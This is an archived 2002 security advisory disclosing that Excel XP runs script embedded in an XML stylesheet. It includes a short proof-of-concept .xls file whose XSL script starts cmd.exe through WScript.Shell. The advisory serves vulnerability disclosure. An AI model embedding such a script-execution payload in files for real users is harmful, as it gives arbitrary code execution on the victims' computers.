TUCoPS :: Windows Apps :: excel2.txt

Excel XP XML Stylesheet Problems 

Excel XP xml stylesheet problems

Georgi Guninski security advisory #55, 2002

Excel XP xml stylesheet problems

Systems affected: Excel XP
Risk: Low (user interaction required)
Date: 24 May 2002

Legal Notice:
This Advisory is Copyright (c) 2002 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission.

Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any
damages
caused by direct or  indirect use of the information or
functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.
Anything in this document may change without notice.

Interesting news:
According to
http://www.eweek.com/article/0,3658,s%253D701%2526a%253D26875,00.asp
"...He (MS) later acknowledged that some Microsoft code was so
flawed
it could not be safely disclosed..."
LOL
They call this trusthworthy??????

Description:

Excel XP tries to play with new technologies like XML and XSLT.
Unfortunately the Excel seem "so flawed" that if the user
opens a .xls file and chooses to view it with xml stylesheet
arbitrary code
may be executed. As script kiddies know this may lead to taking full
control
over user's computer. Excel does not give any warning to the user -
just asks
whether to use the style sheet or not. The default option is *not*
to
display with the stylesheet though.

Details:

Consider this xls file
------xls_sux.xls-----
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="#?m$ux" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:script>
<![CDATA[
x=new ActiveXObject("WScript.Shell");
x.Run("%systemroot%\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a /p /s");
]]>
</xsl:script>
<msux>
msux
written by georgi guninski
</msux>
</xsl:stylesheet>
----------------------

It contains both XML and a stylesheet in one file.

Workaround/Solution:
Do not choose to use xml stylesheets in Excel if asked.
poweroff(8) the poor windoze box if you see Excel mentions
stylesheets.

Vendor status: microsoft was notified on 23 May 2002

Regards,
Georgi Guninski
http://www.guninski.com

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH